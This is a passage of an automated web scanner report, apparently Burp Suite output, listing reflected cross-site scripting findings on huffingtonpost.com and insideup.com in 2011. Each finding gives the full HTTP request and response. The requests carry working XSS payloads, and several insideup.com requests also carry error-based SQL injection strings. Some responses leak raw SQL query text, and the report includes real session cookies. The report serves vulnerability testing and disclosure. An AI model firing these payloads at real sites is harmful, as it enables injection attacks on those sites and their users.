5.78. http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload e5209<script>alert(1)</script>5ce65e42038 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous&gn=window.Badges_216861968_1&eu=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&id=840995&eco=1301155920&ebi2&entry_design=&cb=window.Badges_216861968_1.slicesCallbacke5209<script>alert(1)</script>5ce65e42038&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1300987757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1364029523-1300987777508; __qseg=Q_D|Q_T|Q_2687|Q_2685|Q_2402|Q_1910|Q_1908|Q_1905|Q_1592|Q_683|Q_682|Q_680|Q_679|Q_678|Q_677|Q_676|Q_666|Q_665|Q_660|Q_657; huffpost_adssale=y; s_pers=%20s_getnr%3D1301171811856-Repeat%7C1364243811856%3B%20s_nrgvo%3DRepeat%7C1364243811860%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; huffpo_type_views=%7B%222%22%3A1%7D; __utma=265287574.492257335.1300987757.1300987757.1301171812.2; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1301171812

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 20:36:19 GMT
Content-Length: 7536
Connection: close

window.Badges_216861968_1.slicesCallbacke5209<script>alert(1)</script>5ce65e42038({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous"],"global_name":"window.Badges_216861968_1","slice_params":{"facebook_glamorous":{"share_amount":"3,283"},
...[SNIP]...

5.79. http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the gn request parameter is copied into the HTML document as plain text between tags. The payload 10a73<img%20src%3da%20onerror%3dalert(1)>afed2c094bf was submitted in the gn parameter. This input was echoed as 10a73<img src=a onerror=alert(1)>afed2c094bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorous&gn=window.Badges_216861968_110a73<img%20src%3da%20onerror%3dalert(1)>afed2c094bf&eu=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&id=840995&eco=1301155920&ebi2&entry_design=&cb=window.Badges_216861968_1.slicesCallback&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1300987757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1364029523-1300987777508; __qseg=Q_D|Q_T|Q_2687|Q_2685|Q_2402|Q_1910|Q_1908|Q_1905|Q_1592|Q_683|Q_682|Q_680|Q_679|Q_678|Q_677|Q_676|Q_666|Q_665|Q_660|Q_657; huffpost_adssale=y; s_pers=%20s_getnr%3D1301171811856-Repeat%7C1364243811856%3B%20s_nrgvo%3DRepeat%7C1364243811860%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; huffpo_type_views=%7B%222%22%3A1%7D; __utma=265287574.492257335.1300987757.1300987757.1301171812.2; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1301171812

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 20:36:18 GMT
Content-Length: 7539
Connection: close

window.Badges_216861968_1.slicesCallback({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorous"],"global_name":"window.Badges_216861968_110a73<img src=a onerror=alert(1)>afed2c094bf","slice_params":{"facebook_glamorous":{"share_amount":"3,283"},"retweet_glamorous":{"short_url":"http:\/\/huff.to\/hL3Bum","tweet_text":"BREAKING: Geraldine Ferraro passes away at 75","views_amount":"
...[SNIP]...

5.80. http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /badge/badges_json_v2.php

Issue detail

The value of the sn request parameter is copied into the HTML document as plain text between tags. The payload d63f1<img%20src%3da%20onerror%3dalert(1)>fdda9b0981e was submitted in the sn parameter. This input was echoed as d63f1<img src=a onerror=alert(1)>fdda9b0981e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /badge/badges_json_v2.php?sn=facebook_glamorous,retweet_glamorous,email_glamorous,comment_glamorousd63f1<img%20src%3da%20onerror%3dalert(1)>fdda9b0981e&gn=window.Badges_216861968_1&eu=http%3A//www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html&id=840995&eco=1301155920&ebi2&entry_design=&cb=window.Badges_216861968_1.slicesCallback&ng=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1300987757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1364029523-1300987777508; __qseg=Q_D|Q_T|Q_2687|Q_2685|Q_2402|Q_1910|Q_1908|Q_1905|Q_1592|Q_683|Q_682|Q_680|Q_679|Q_678|Q_677|Q_676|Q_666|Q_665|Q_660|Q_657; huffpost_adssale=y; s_pers=%20s_getnr%3D1301171811856-Repeat%7C1364243811856%3B%20s_nrgvo%3DRepeat%7C1364243811860%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; huffpo_type_views=%7B%222%22%3A1%7D; __utma=265287574.492257335.1300987757.1300987757.1301171812.2; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.2.10.1301171812

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 20:36:16 GMT
Content-Length: 7560
Connection: close

window.Badges_216861968_1.slicesCallback({"slice_names":["facebook_glamorous","retweet_glamorous","email_glamorous","comment_glamorousd63f1<img src=a onerror=alert(1)>fdda9b0981e"],"global_name":"window.Badges_216861968_1","slice_params":{"facebook_glamorous":{"share_amount":"3,283"},"retweet_glamorous":{"short_url":"http:\/\/huff.to\/hL3Bum","tweet_text":"BREAKING: Geraldine
...[SNIP]...

5.81. http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /permalink-tracker.html

Issue detail

The value of the vertical request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 351ba"%3balert(1)//b9d3a987aa3 was submitted in the vertical parameter. This input was echoed as 351ba";alert(1)//b9d3a987aa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /permalink-tracker.html?vertical=politics351ba"%3balert(1)//b9d3a987aa3 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1300987755000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1300987757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1364029523-1300987777508; __qseg=Q_D|Q_T|Q_2687|Q_2685|Q_2402|Q_1910|Q_1908|Q_1905|Q_1592|Q_683|Q_682|Q_680|Q_679|Q_678|Q_677|Q_676|Q_666|Q_665|Q_660|Q_657; huffpost_adssale=y; s_pers=%20s_getnr%3D1301171811856-Repeat%7C1364243811856%3B%20s_nrgvo%3DRepeat%7C1364243811860%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; huffpo_type_views=%7B%222%22%3A1%7D; __utma=265287574.492257335.1300987757.1300987757.1301171812.2; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.6.10.1301171812

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=289
Date: Sat, 26 Mar 2011 20:36:20 GMT
Content-Length: 994
Connection: close

<html>
<head>
<title>Huffit Tracker</title>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_config.js%2Chp_track.js&amp;v44491"></script>
</head>
<body>
   <!-- Con
...[SNIP]...
<script type="text/javascript">
       HPConfig.current_vertical_name = "politics351ba";alert(1)//b9d3a987aa3";
       HPConfig.current_web_address = "www.huffingtonpost.com";
       HPConfig.inst_type = "prod";
       HPConfig.timestamp_for_clearing_js = "1301078667";
   </script>
...[SNIP]...

5.82. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [iusrc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The value of the iusrc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dd63"><script>alert(1)</script>53698cadc19 was submitted in the iusrc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=34dd63"><script>alert(1)</script>53698cadc19 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47863


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<input type="hidden" name="iusrc" value="34dd63"><script>alert(1)</script>53698cadc19 ">
...[SNIP]...

5.83. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6306'%3balert(1)//ea983b03af0 was submitted in REST URL parameter 2. This input was echoed as b6306';alert(1)//ea983b03af0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ppc/leadflowb6306'%3balert(1)//ea983b03af0/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:23 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5333
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lead_flow_template temps on temps.template_id = prj.templateId
   left join lead_flow_group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflowb6306';alert(1)//ea983b03af0/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

5.84. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload beb88'%3balert(1)//2d44c5a2fc8 was submitted in REST URL parameter 3. This input was echoed as beb88';alert(1)//2d44c5a2fc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ppc/leadflow/hins00beb88'%3balert(1)//2d44c5a2fc8/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5333
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lead_flow_template temps on temps.template_id = prj.templateId
   left join lead_flow_group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/hins00beb88';alert(1)//2d44c5a2fc8/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

5.85. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f34e'%3balert(1)//49eac350b90 was submitted in REST URL parameter 4. This input was echoed as 5f34e';alert(1)//49eac350b90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ppc/leadflow/hins00/project.php5f34e'%3balert(1)//49eac350b90?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:21:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5333
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lead_flow_template temps on temps.template_id = prj.templateId
   left join lead_flow_group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/hins00/project.php5f34e';alert(1)//49eac350b90?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

5.86. http://www.insideup.com/ppc/leadflow/hins00/project.php [catId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The value of the catId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1ac5'%3balert(1)//63a331a2c77 was submitted in the catId parameter. This input was echoed as e1ac5';alert(1)//63a331a2c77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002e1ac5'%3balert(1)//63a331a2c77&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5333
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lead_flow_template temps on temps.template_id = prj.templateId
   left join lead_flow_group grps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002e1ac5';alert(1)//63a331a2c77&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

5.87. http://www.insideup.com/ppc/leadflow/hins00/project.php [iusrc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The value of the iusrc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0cdd"><script>alert(1)</script>6d45ca83c0c was submitted in the iusrc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=f0cdd"><script>alert(1)</script>6d45ca83c0c HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53862


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<input type="hidden" name="iusrc" value="f0cdd"><script>alert(1)</script>6d45ca83c0c ">
...[SNIP]...

5.88. http://www.insideup.com/ppc/leadflow/hins00/project.php [iusrc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The value of the iusrc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77a25'%3balert(1)//b75a0f29006 was submitted in the iusrc parameter. This input was echoed as 77a25';alert(1)//b75a0f29006 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

